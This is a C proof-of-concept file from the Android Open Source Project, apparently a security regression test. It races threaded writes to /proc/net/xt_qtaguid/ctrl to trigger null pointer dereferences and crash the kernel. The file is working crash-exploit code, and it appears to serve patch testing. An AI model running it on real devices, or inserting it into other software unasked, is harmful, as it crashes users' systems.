/**
 * Copyright (C) 2018 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

#define MAX_THREAD 6

int ctrl_fd;
static int cmd;
static int status[MAX_THREAD];
static int sock_fd;

void *thread_entry(void *arg) {
  int index, len = 256, ret;
  char buf[256];
  index = (int)(unsigned long)arg;
  memset(buf, 0x0, 256);
  status[index] = 1;

  // cmd =-1 signifies error in thread creation
  while (cmd != 1 && cmd != -1) {
    usleep(5);
  }

  if (cmd != -1) {
    switch (index % 3) {
      case 0:
        len = sprintf(buf, "d %lu", (unsigned long)0);
        break;
      case 2:
        len = sprintf(buf, "t %d", sock_fd);
        break;
    }

    ret = write(ctrl_fd, buf, len);
  }

  status[index] = 2;
  return NULL;
}
/*
 *This PoC creates multiple threads to write /proc/net/xt_qtaguid/ctrl device
 *which causes null pointer derefrences in netstat.
 */
int main() {
  int fd, retry = 1024;
  int ret, i, loop;
  pthread_t tid[MAX_THREAD];

  fork();
  sock_fd = socket(AF_INET, SOCK_STREAM, 0);
  while (retry--) {
    cmd = 0;
    for (i = 0; i < MAX_THREAD; i++) {
      status[i] = 0;
    }

    fd = open("/dev/xt_qtaguid", O_RDONLY);
    if (fd < 0) {
      return -1;
    }

    ctrl_fd = open("/proc/net/xt_qtaguid/ctrl", O_RDWR);
    if (ctrl_fd < 0) {
      return -1;
    }

    for (i = 0; i < MAX_THREAD; i++) {
      ret =
          pthread_create(&tid[i], NULL, thread_entry, (void *)(unsigned long)i);
      if (ret != 0) {
        cmd = -1;
        close(ctrl_fd);
      }
    }

    loop = 1;
    int count = 0;
    // loop until all threads have status == 1
    while (loop) {
      loop = 0;
      count = count + 1;
      for (i = 0; i < MAX_THREAD; i++)
        if (status[i] != 1) {
          loop = 1;
          break;
        }

      if (loop) {
        usleep(5);
      }
    }

    cmd = 1;
    loop = 1;
    while (loop) {
      loop = 0;
      count = count + 1;
      for (i = 0; i < MAX_THREAD; i++)
        if (status[i] != 2) {
          loop = 1;
          break;
        }

      if (loop) {
        usleep(5);
      }
    }
    close(fd);
  }
  return 0;
}
